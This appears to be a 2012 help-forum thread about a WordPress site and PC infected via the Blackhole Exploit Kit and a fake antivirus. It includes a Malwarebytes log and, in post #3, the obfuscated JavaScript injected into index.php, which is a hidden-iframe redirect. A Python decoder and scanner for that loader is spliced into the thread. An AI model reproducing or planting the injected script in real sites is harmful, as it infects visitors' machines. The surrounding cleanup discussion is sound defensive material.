
Blackhole Exploit Kit (type 2115)/Smart Protection 2012


8 replies to this topic

#1 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 16 February 2012 - 10:17 PM

I can find very little info on Blackhole Exploit Kit (type 2115). It appeared after I got a pop-up on my web site offering Smart Protection 2012 (spoof AV malware) and warning of dozens of infections, which I didn't run. Does anyone have any info on removing it?

I am now getting malicious obfuscated scripts inserted in my WordPress php files, e.g. index.php. As quickly as I edit them they reappear. My hosts have run various scans on my VPS and we thought we had all the culprits. Obviously not. It also seems that my PC is getting re-infected, in spite of all clears:

Malwarebytes Anti-Malware 1.60.1.1000
www.malwarebytes.org

Database version: v2012.02.09.07

Windows 7 x64 NTFS
Internet Explorer 8.0.7600.16385
Bruce :: WORK-PC [administrator]

09/02/2012 23:25:06
mbam-log-2012-02-09 (23-25-06).txt

I also run TalkTalk's suite by F-Secure.

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 201679
Time elapsed: 3 minute(s), 8 second(s)

Memory Processes Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> 4020 -> Delete on reboot.

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Protection 2012 (Trojan.FakeAlert) -> Quarantined and deleted successfully.

Registry Values Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|F4D55EFF00015B2B0004361DA6014588 (Trojan.FakeAlert) -> Data: C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> Delete on reboot.

(end)

Can anyone tell me if the site is infecting my PC or vice versa? Given much of the problem is definitely on the server, I can't supply the usual reports you require, AFAIK. What info can I provide to assist?

I have attached the reports from my PC.

Thanks in advance.


Edited by Esinem, 16 February 2012 - 11:08 PM.


#2 sempai

sempai

    3 stars and a sun

  • Admin
  • 1,043 posts

Posted 17 February 2012 - 05:44 PM

Hi,

Is this an office or business computer?

#3 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 17 February 2012 - 08:14 PM

Here's what it inserts in index.php:

<script>var a='';var b='a3t.tmddri5g%e%%%%22Aaeh6c2%%32d%iir0wvf3%32%h2r%%a30%/l/p8t232D0e2fe%%s..3ret2t2o2CEr%twsai6tw2i5mDEefchwirF2D02e2a33mmDpaae%iud%h2b233Cs2/ai%3%%D0%fr2r%23tmpDe%h2%%r0/ ';var c='1382650749';for(var i=0;i<17;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*17)+i);document.writeln(unescape(a));</script>
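Rather than letting a browser run that script, a defender can replay its decoding loop offline to see what it actually writes into the page. The Python below is an added example, not code from this thread: it pulls the obfuscated string b and the digit key c out of the snippet above (embedded here as a constructed sample inside an index.php), reverses the row/column shuffle the nested charAt() loop performs, percent-decodes the result the way unescape() does, and flags the output when it is a tiny iframe, the drive-by redirect shape the poster describes.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the <script> quoted in post #3, as it sits inside index.php.
SAMPLE_INDEX_PHP = (
    "<?php /* legitimate WordPress loader would be here */ ?>\n"
    "<script>var a='';var b='a3t.tmddri5g%e%%%%22Aaeh6c2%%32d%iir0wvf3%32%h2r%%a30%/l/p8t"
    "232D0e2fe%%s..3ret2t2o2CEr%twsai6tw2i5mDEefchwirF2D02e2a33mmDpaae%iud%h2b233Cs2/ai%3"
    "%%D0%fr2r%23tmpDe%h2%%r0/ ';var c='1382650749';for(var i=0;i<17;i++) "
    "for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*17)+i);"
    "document.writeln(unescape(a));</script>\n"
)

# Signature of this loader: string b, numeric key c, and the nested charAt() loop
# that indexes b as a grid, ending in document.writeln(unescape(a)).
LOADER = re.compile(
    r"var b='(?P<b>[^']*)';\s*var c='(?P<c>\d+)';\s*"
    r"for\(var i=0;i<(?P<cols>\d+);i\+\+\)\s*for\(var j=0;j<(?P<rows>\d+);j\+\+\)\s*"
    r"a\+=b\.charAt\(\(parseInt\(c\.charAt\(j\)\)\*(?P=cols)\)\+i\);\s*"
    r"document\.writeln\(unescape\(a\)\)"
)


def decode_grid(b, c, cols):
    """Replay the loop: b is a grid of len(c) rows by cols columns; the output walks
    column by column, taking rows in the order given by the digits of c."""
    out = [b[int(d) * cols + i] for i in range(cols) for d in c]
    return unquote("".join(out))  # same effect as JavaScript unescape() for %XX escapes


def find_injections(php_source):
    """Return [(decoded_html, looks_like_hidden_iframe)] for each loader found."""
    hits = []
    for m in LOADER.finditer(php_source):
        b, c = m.group("b"), m.group("c")
        cols, rows = int(m.group("cols")), int(m.group("rows"))
        if len(c) != rows or len(b) < rows * cols:
            continue  # grid does not line up with the key: a different variant, do not guess
        html = decode_grid(b, c, cols)
        dims = [int(v) for v in re.findall(r'(?:width|height)="(\d+)"', html)]
        hidden = html.lstrip().startswith("<iframe") and bool(dims) and max(dims) <= 10
        hits.append((html, hidden))
    return hits


if __name__ == "__main__":
    for html, hidden in find_injections(SAMPLE_INDEX_PHP):
        print(("HIDDEN IFRAME: " if hidden else "decoded: ") + html.strip())
```

Pointing find_injections() at every .php file under the web root turns the same check into a scan for re-infection, and the decoded iframe URL is what to block at the proxy while the server-side foothold is cleaned.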


#4 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 12:21 AM

My home PC and on a web site I run. I see another poster has this problem. This seems to be a new variant with little info as yet :-(

#5 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 11:35 AM

My hosting company just did another scan and only found infection in a.php. I am hoping this is what has been reinfecting it and all is well now. I hope this helps others.

#6 sempai

sempai

    3 stars and a sun

  • Admin
  • 1,043 posts

Posted 18 February 2012 - 06:14 PM

Thank you for letting us know.

#7 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 08:01 PM

If I get any more intel on this I'll let you know. So far so good but there was a delay of several hours between reinfections last time. Security has been beefed up...fingers crossed.

#8 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 28 March 2012 - 08:20 AM

Eureka! The infection hides in a timthumb.php file and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This page tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work.

#9 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 28 March 2012 - 08:22 AM

Eureka! The infection hides in a timthumb.php or thumb.php files and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This page tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work.